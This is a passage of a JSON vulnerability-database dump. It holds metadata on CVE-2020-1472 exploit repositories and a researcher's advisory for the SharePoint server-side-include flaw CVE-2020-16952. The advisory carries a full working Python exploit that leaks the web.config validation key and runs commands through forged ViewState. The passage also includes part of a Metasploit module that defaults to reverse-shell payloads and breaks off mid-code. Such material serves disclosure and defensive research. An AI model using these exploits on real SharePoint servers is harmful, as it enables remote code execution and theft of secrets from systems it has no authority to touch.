"userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:57:04", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-25T06:08:29", "id": "5B025A0D-055E-552C-B1FB-287C6F191F8E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:08:34", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-21T09:42:34", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-30T02:59:52", "id": "20466D13-6C5B-5326-9C8B-160E9BE37195", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:17", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-28T06:53:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-28T06:53:54", "id": "F085F702-F1C3-5ACB-99BE-086DA182D98B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:17", "description": "# CVE-2020-1472\nChecker & Exploit Code for CVE-2020-1472 aka **Z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T13:50:01", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-20T18:17:37", "id": "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:13:01", "description": "\u590d\u73b0\u5b8c\u4e86\u6709\u70b9\u5c0fBUG\uff0c\u91cd\u542f\u540e\u4f1a\u5361\u5728\u767b\u5f55\u9875\u9762\u6bd4\u8f83\u4e45\u3002\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u53ea\u6709\u6211\u4f1a\u3002(\u8c28\u614e\u5728\u771f\u5b9e\u73af\u5883\u5229\u7528)\r\n\u5b9e\u6218\u4e2d\u53ef\u4ee5\u4f7f\u7528secretsd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:11:49", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-04-18T11:22:10", "id": "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-09T02:11:36", "description": "# CVE-2020-1472 POC\nmac\u73af\u5883\u4e0b\u901a\u8fc7proxychains\u4ee3\u7406\u7684\u65b9\u5f0f\u5728window\u57df\u73af\u5883\u4e2d\u590d\u73b0\u8be5\u6f0f\u6d1e\u3002\n\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:40:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-08T02:18:20", "id": "F472C105-E3B1-524A-BBF5-1C436185F6EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "srcincite": [{"lastseen": "2022-04-20T17:15:48", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of SharePoint Server. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the DataFormWebPart class. The issue results from the lack of proper validation of user-supplied data which can result in a server side include. An attacker can leverage this vulnerability to execute code in the context of the local Administrator.\n\n**Affected Vendors:**\n\nMicrosoft\n\n**Affected Products:**\n\nSharePoint Server\n\n**Vendor Response:**\n\nMicrosoft has issued an update to correct this vulnerability. More details can be found at: <https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "srcincite", "title": "SRC-2020-0022 : Microsoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "id": "SRC-2020-0022", "href": "https://srcincite.io/advisories/src-2020-0022/", "sourceData": "#!/usr/bin/python3\r\n\"\"\"\r\nMicrosoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability\r\nPatch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952\r\n\r\n## Summary:\r\n\r\nAn authenticated attacker can craft pages to trigger a server-side include that can be leveraged to leak the web.config file. The attacker can leverage this to achieve remote code execution.\r\n\r\n## Notes:\r\n\r\n- this does not require the use of a SharePoint endpoint such as WebPartPagesWebService\r\n- the attacker needs AddAndCustomizePages permission enabled which is the default\r\n- you will need to compile and store ysoserial.net in the same folder as this exploit\r\n\r\n## Vulnerability Analysis:\r\n\r\nInside of the Microsoft.SharePoint.WebPartPages.DataFormWebPart we can observe the `CreateChildControls`\r\n\r\n```c#\r\nnamespace Microsoft.SharePoint.WebPartPages\r\n{\r\n [XmlRoot(Namespace = \"http://schemas.microsoft.com/WebPart/v2/DataView\")]\r\n [ParseChildren(true)]\r\n [Designer(typeof(DataFormWebPartDesigner))]\r\n [SupportsAttributeMarkup(true)]\r\n [AspNetHostingPermission(SecurityAction.LinkDemand, Level = AspNetHostingPermissionLevel.Minimal)]\r\n [SharePointPermission(SecurityAction.LinkDemand, ObjectModel = true)]\r\n [AspNetHostingPermission(SecurityAction.InheritanceDemand, Level = AspNetHostingPermissionLevel.Minimal)]\r\n [SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)]\r\n public class DataFormWebPart : BaseXsltDataWebPart, IDesignTimeHtmlProvider, IPostBackEventHandler, IWebPartRow, ICallbackEventHandler, IConnectionData, IListWebPart\r\n {\r\n \r\n // ...\r\n [SharePointPermission(SecurityAction.Demand, ObjectModel = true)]\r\n protected override void CreateChildControls()\r\n {\r\n if (!this.Visible)\r\n {\r\n return;\r\n }\r\n if (!this.AreAllConsumerInterfacesFulfilled())\r\n {\r\n this._deferredXSLTBecauseOfConnections = true;\r\n return;\r\n }\r\n if ((base.DesignMode && this.AllowXSLTEditing) || this._forAJAXDropDown)\r\n {\r\n return;\r\n }\r\n if (this.IsMondoCAMLWebPart() && !base.DesignMode && !string.IsNullOrEmpty(this.ListName) && !this.IsForm)\r\n {\r\n SPContext context = SPContext.GetContext(this.Context, base.StorageKey, new Guid(this.ListName), this.CurrentWeb);\r\n if (context != null)\r\n {\r\n SPViewContext viewContext = context.ViewContext;\r\n if (this is BaseXsltListWebPart)\r\n {\r\n BaseXsltListWebPart baseXsltListWebPart = this as BaseXsltListWebPart;\r\n if (baseXsltListWebPart.view != null)\r\n {\r\n viewContext.View = baseXsltListWebPart.view;\r\n }\r\n }\r\n if (viewContext != null && base.RenderMode != RenderMode.Design && base.RenderMode != RenderMode.Preview)\r\n {\r\n viewContext.RedirectIfNecessary();\r\n }\r\n }\r\n }\r\n base.CreateChildControls();\r\n this.AddDataSourceControls();\r\n UpdatePanel updatePanel = null;\r\n if (this.AsyncRefresh)\r\n {\r\n this.CreateAsyncPostBackControls(ref updatePanel);\r\n this.AddAutoRefreshTimer(updatePanel);\r\n }\r\n if (base.DesignMode || !this.InitialAsyncDataFetch || this.Page == null || this.Page.IsCallback)\r\n {\r\n this.EnsureDataBound(); // 1\r\n }\r\n else\r\n {\r\n this._asyncDelayed = true;\r\n if (this.SPList != null && this.SPList.HasExternalDataSource)\r\n {\r\n this.deferXsltTransform = false;\r\n this.EnsureDataBound();\r\n }\r\n string text = Utility.MakeLayoutsRootServerRelative(\"images/gears_an.gif\");\r\n string @string = WebPartPageResource.GetString(\"DataFormWebPartRefreshing\");\r\n this._partContent = this._partContent + \"\";\r\n string partContent = this._partContent;\r\n this._partContent = string.Concat(new string[]\r\n {\r\n partContent,\r\n \"\"\r\n });\r\n this._partContent += \"\";\r\n }\r\n this.EditMode = false;\r\n if (this._partContent != null)\r\n {\r\n if (this.IsForm && this.DataSource is SPDataSource && base.PageComponent != null && this.ItemContext != null)\r\n {\r\n this.ItemContext.CurrentPageComponent = base.PageComponent;\r\n }\r\n bool flag = this.view != null && base.PageComponent != null;\r\n if ((this.IsGhosted || flag) && !this.UseSchemaXmlToolbar && this.ToolbarControl != null)\r\n {\r\n if (base.PageComponent != null)\r\n {\r\n this.ToolbarControl.RenderContext.CurrentPageComponent = base.PageComponent;\r\n }\r\n if ((this.view == null || !this.view.IsGroupRender) && (!this._asyncDelayed || flag))\r\n {\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(this.ToolbarControl);\r\n }\r\n else\r\n {\r\n this.Controls.Add(this.ToolbarControl);\r\n }\r\n }\r\n }\r\n else\r\n {\r\n this.CanHaveServerControls = true;\r\n }\r\n if (this.CanHaveServerControls && DataFormWebPart.RunatChecker.IsMatch(this._partContent)) // 2\r\n {\r\n if (this._assemblyReferences != null && this._partContent != null)\r\n {\r\n StringBuilder stringBuilder = new StringBuilder();\r\n for (int i = 0; i < this._assemblyReferences.Length; i++)\r\n {\r\n stringBuilder.Append(this._assemblyReferences[i]);\r\n }\r\n stringBuilder.Append(this._partContent);\r\n this._partContent = stringBuilder.ToString();\r\n }\r\n if (base.Web != null)\r\n {\r\n EditingPageParser.VerifyControlOnSafeList(this._partContent, null, base.Web, false); // 3\r\n }\r\n if (this.Page.AppRelativeVirtualPath == null)\r\n {\r\n this.Page.AppRelativeVirtualPath = \"~/current.aspx\";\r\n }\r\n bool flag2 = EditingPageParser.VerifySPDControlMarkup(this._partContent);\r\n if (flag2)\r\n {\r\n ULS.SendTraceTag(595161362U, ULSCat.msoulscat_WSS_WebParts, ULSTraceLevel.Medium, \"Allow DFWP XSL markup {0} to be parsed without parserFilter.\", new object[]\r\n {\r\n this._partContent\r\n });\r\n }\r\n Control control = this.Page.ParseControl(this._partContent, flag2); // 4\r\n SPDataSource spdataSource = this.DataSource as SPDataSource;\r\n bool flag3 = false;\r\n if (this.view != null && !string.IsNullOrEmpty(this.view.InlineEdit))\r\n {\r\n flag3 = this.view.InlineEdit.Equals(\"true\", StringComparison.OrdinalIgnoreCase);\r\n }\r\n SPContext spcontext = null;\r\n if (spdataSource != null && base.Web != null && (spdataSource.DataSourceMode == SPDataSourceMode.ListItem || (spdataSource.DataSourceMode == SPDataSourceMode.List && flag3)))\r\n {\r\n string text3;\r\n if (spdataSource.DataSourceMode == SPDataSourceMode.List)\r\n {\r\n string text2 = (string)this.ParameterValues.Collection[\"dvt_form_key\"];\r\n text3 = text2;\r\n }\r\n else\r\n {\r\n text3 = spdataSource.ListItemID.ToString(CultureInfo.InvariantCulture);\r\n }\r\n if (text3 != null)\r\n {\r\n if (this.FormContexts.ContainsKey(text3))\r\n {\r\n spcontext = this.FormContexts[text3];\r\n }\r\n else\r\n {\r\n spcontext = SPContext.GetContext(this.Context, text3, ((IListWebPart)this).ListId, this.CurrentWeb);\r\n this.FormContexts[text3] = spcontext;\r\n }\r\n }\r\n }\r\n foreach (object obj in control.Controls)\r\n {\r\n Control control2 = (Control)obj;\r\n this.RecursivelyAddFormFieldContext(control2, spcontext);\r\n }\r\n if (spcontext != null && spdataSource != null)\r\n {\r\n spdataSource.ItemContext = spcontext;\r\n }\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(control); // 5\r\n }\r\n else\r\n {\r\n this.AddParsedSubObject(control);\r\n }\r\n using (IEnumerator enumerator2 = control.Controls.GetEnumerator())\r\n {\r\n while (enumerator2.MoveNext())\r\n {\r\n object obj2 = enumerator2.Current;\r\n Control control3 = (Control)obj2;\r\n this.RecursivelyProcessChildFormControls(control3);\r\n }\r\n goto IL_632;\r\n }\r\n }\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n if (this._listView != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(this._listView);\r\n }\r\n else\r\n {\r\n Literal literal = new Literal();\r\n literal.Text = this._partContent;\r\n updatePanel.ContentTemplateContainer.Controls.Add(literal);\r\n }\r\n }\r\n else if (this._listView != null)\r\n {\r\n this.AddParsedSubObject(this._listView);\r\n }\r\n else\r\n {\r\n this.AddParsedSubObject(new Literal\r\n {\r\n Text = this._partContent\r\n });\r\n }\r\n IL_632:\r\n this.RemoveViewStateIfEmpty(\"ParamValues\");\r\n this.RemoveViewStateIfEmpty(\"FilterOperations\");\r\n this.RemoveViewStateIfEmpty(\"IntermediateFormActions\");\r\n this.RemoveViewStateIfEmpty(\"OriginalValues\");\r\n this._partContent = null;\r\n this._listView = null;\r\n }\r\n this._asyncDelayed = false;\r\n }\r\n```\r\n\r\nAt *[1]*, the code performs a databind and accesses the data from the datasource (in this case it's our controlled serverside http header). The data returned must be valid xml so that it can be processed via our crafted xslt. Then at *[2]* the code calls `DataFormWebPart.RunatChecker.IsMatch` on our controlled `_partContent`. This checks for an instance of `runat=server` in the supplied xml. However, we can't put that in there because we can't register any prefixes (registration is probably not possible due to the <% not being a valid xml tag). But I found a way to pass the check by using HTML server controls which can include a `runat=server`.\r\n\r\nAt *[3]* the code calls `VerifyControlOnSafeList` with the false flag, meaning our input can use server-side includes. Lucky for us, includes are valid xml, so we can stuff them into our `_partContent` and later at *[4]* they are parsed and finally added to the page at *[5]*.\r\n\r\nThis allows an us to leak the complete `web.config` file, including the Validation Key which is enough to generate a malicious serialized viewState and trigger rce via deserialization.\r\n\r\n## Fingerprint:\r\n\r\nFor detecting vulnerable versions before exploitation, you can use this:\r\n\r\n```\r\nPUT /poc.aspx HTTP/1.1\r\nHost: [target]\r\nContent-Length: 67```\r\n\r\nThen https://[target]/poc.aspx should return 16.0.10364.20001.\r\n\r\n## Credit:\r\n\r\nSteven Seeley (mr_me) of Qihoo 360 Vulcan Team\r\n\r\n## Example:\r\n\r\nFor testing, download ysoserial.net and store it in a folder called `yss`.\r\n\r\nresearcher@DESKTOP-H4JDQCB:~$ ./poc.py\r\n(+) usage: ./poc.py(+) eg: ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### mspaint\r\n(+) eg: ./poc.py win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad\r\n\r\nresearcher@DESKTOP-H4JDQCB:~$ ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### notepad\r\n(+) leaked validation key: 55AAE0A8E646746523FA5EE0675232BE39990CDAC3AE2B0772E32D71C05929D8\r\n(+) triggering rce, running 'cmd /c notepad'\r\n(+) done! rce achieved\r\n\"\"\"\r\nimport os\r\nimport re\r\nimport sys\r\nimport urllib3\r\nimport requests\r\nimport subprocess\r\nfrom platform import uname\r\nfrom requests_ntlm2 import HttpNtlmAuth\r\nfrom urllib.parse import urlparse\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\ndef put_page(target, domain, user, password):\r\n payload = \"\"\"\"\"\"\r\n r = requests.put(\"http://%s/poc.aspx\" % target, data=payload, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password))\r\n assert (r.status_code == 200 or r.status_code == 201), \"(-) page creation failed, user doesn't have site ownership rights!\"\r\n\r\ndef get_vkey(target, domain, user, password):\r\n h = { \"360Vulcan\": \"\" }\r\n r = requests.get(\"http://%s/poc.aspx\" % target, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password), headers=h)\r\n match = re.search(\"machineKey validationKey=\\\"(.{64})\", r.text)\r\n assert match, \"(-) unable to leak the validation key, exploit failed!\"\r\n return match.group(1)\r\n\r\ndef trigger_rce(target, domain, path, user, password, cmd, key):\r\n out = subprocess.Popen([\r\n 'yss/ysoserial.exe', \r\n '-p', 'ViewState',\r\n '-g', 'TypeConfuseDelegate',\r\n '-c', '%s' % cmd,\r\n '--apppath=%s' % path,\r\n '--path=%s_layouts/15/zoombldr.aspx' % path,\r\n '--islegacy',\r\n '--validationalg=HMACSHA256',\r\n '--validationkey=%s' % key\r\n ], stdout=subprocess.PIPE)\r\n rce = { \"__VIEWSTATE\" : out.communicate()[0].decode() }\r\n requests.post(\"http://%s/_layouts/15/zoombldr.aspx\" % target, data=rce, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password))\r\n\r\ndef main():\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s\" % sys.argv[0])\r\n print(\"(+) eg: %s win-3t816hj84n4 harryh@pwn.me:user123### mspaint\" % sys.argv[0])\r\n print(\"(+) eg: %s win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad\" % sys.argv[0])\r\n sys.exit(-1)\r\n target = sys.argv[1]\r\n user = sys.argv[2].split(\":\")[0].split(\"@\")[0]\r\n password = sys.argv[2].split(\":\")[1]\r\n domain = sys.argv[2].split(\":\")[0].split(\"@\")[1]\r\n cmd = sys.argv[3]\r\n path = urlparse(\"http://%s\" % target).path or \"/\"\r\n path = path + \"/\" if not path.endswith(\"/\") else path\r\n put_page(target, domain, user, password)\r\n key = get_vkey(target, domain, user, password)\r\n print(\"(+) leaked validation key: %s\" % key)\r\n print(\"(+) triggering rce, running 'cmd /c %s'\" % cmd)\r\n trigger_rce(target, domain, path, user, password, cmd, key)\r\n print(\"(+) done! rce achieved\")\r\n\r\nif __name__ == '__main__':\r\n if \"microsoft\" not in uname()[2].lower():\r\n print(\"(-) WARNING - this was tested on wsl, so it may not work on other platforms\")\r\n if not os.path.exists('yss/ysoserial.exe'):\r\n print(\"(-) missing ysoserial.net!\")\r\n sys.exit(-1)\r\n main()", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://srcincite.io/pocs/cve-2020-16952.py.txt"}], "metasploit": [{"lastseen": "2022-06-24T08:38:31", "description": "This module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization. Tested against SharePoint 2019 on Windows Server 2016.\n", "cvss3": {}, "published": "2020-10-14T22:45:15", "type": "metasploit", "title": "Microsoft SharePoint Server-Side Include and ViewState RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16952"], "modified": "2021-06-14T14:15:27", "id": "MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_SSI_VIEWSTATE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/sharepoint_ssi_viewstate/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::Sharepoint\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',\n 'Description' => %q{\n This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16952'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']\n ],\n 'DisclosureDate' => '2020-10-13', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'DotNetGadgetChain' => :TypeConfuseDelegate\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),\n OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),\n # \"Promote\" these advanced options so we don't have to pass around our own\n OptString.new('HttpUsername', [false, 'SharePoint username']),\n OptString.new('HttpPassword', [false, 'SharePoint password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def cookie\n datastore['COOKIE']\n end\n\n def vuln_builds\n # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates\n # https://buildnumbers.wordpress.com/sharepoint/\n [\n [Rex::Version.new('15.0.0.4571'), Rex::Version.new('15.0.0.5275')], # SharePoint 2013\n [Rex::Version.new('16.0.0.4351'), Rex::Version.new('16.0.0.5056')], # SharePoint 2016\n [Rex::Version.new('16.0.0.10337'), Rex::Version.new('16.0.0.10366')] # SharePoint 2019\n ]\n end\n\n def check\n build = sharepoint_get_version('cookie' => cookie)\n\n if build.nil?\n return CheckCode::Unknown('Failed to retrieve the SharePoint version number')\n end\n\n if vuln_builds.any? { |build_range| build.between?(*build_range) }\n return CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\")\n end\n\n CheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\")\n end\n\n def exploit\n if (username.blank? && password.blank?)\n if cookie.blank?\n fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword or COOKIE are required for exploitation')\n end\n\n print_warning('Using the specified COOKIE for authentication')\n 